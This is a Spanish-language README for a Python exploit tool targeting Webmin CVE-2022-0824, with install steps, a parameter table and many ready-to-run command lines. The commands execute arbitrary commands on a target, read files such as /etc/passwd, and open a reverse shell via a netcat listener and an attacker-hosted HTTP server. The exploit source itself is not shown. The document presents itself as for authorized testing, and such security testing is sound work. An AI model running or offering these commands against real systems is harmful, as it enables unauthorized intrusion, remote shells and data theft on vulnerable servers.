
Exploit en Python para Webmin CVE-2022-0824 con soporte de modo dual: ejecución directa de comandos y shell reversa. Incluye múltiples tipos de payload, gestión inteligente de archivos y registro detallado de depuración para pruebas de seguridad autorizadas.
[!IMPORTANT]
Herramienta de explotación mejorada para Webmin CVE-2022-0824 - Soporta modo de ejecución de comandos y modo de shell inversa
[!IMPORTANT]
Una herramienta de explotación mejorada para la vulnerabilidad CVE-2022-0824 en Webmin, que soporta dos modos: ejecución directa de comandos y shell inversa.
# Python 3.6+
pip3 install requests urllib3
# Ejecución básica de comandos
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"
# Ver información del sistema
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"
# Listar archivos
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"
# Ver archivos sensibles
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"
# Información de red
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"
# 1. Iniciar el listener
nc -nlvp 9999
# 2. Ejecutar el exploit
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999
*Nota: Obligatorio en el modo de shell inversa
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"
Esta herramienta está destinada únicamente para pruebas de seguridad autorizadas y fines educativos.
¡Bienvenidos Issues y Pull Requests!
git checkout -b feature/AmazingFeature)git commit -m 'Add some AmazingFeature')git push origin feature/AmazingFeature)Este proyecto está bajo la licencia MIT - consulta el archivo LICENSE para más detalles
Si tienes preguntas o sugerencias, contacta a través de:
⭐ ¡Si este proyecto te resulta útil, dale una estrella para apoyarlo!
requests>=2.25.1
urllib3>=1.26.0
| Parámetro | Descripción | Obligatorio | Ejemplo |
|---|
-t, --target | URL objetivo de Webmin | ✅ | http://192.168.1.100:10000/ |
-c, --credential | Credenciales de inicio de sesión | ✅ | admin:password |
-LS, --py3http_server | Dirección del servidor HTTP | ✅ | 192.168.1.50:8080 |
--shell | Comando a ejecutar | ❌ | "ls -la" |
-L, --callback_ip | IP para la shell inversa | ❌* | 192.168.1.50 |
-P, --callback_port | Puerto para la shell inversa | ❌* | 9999 |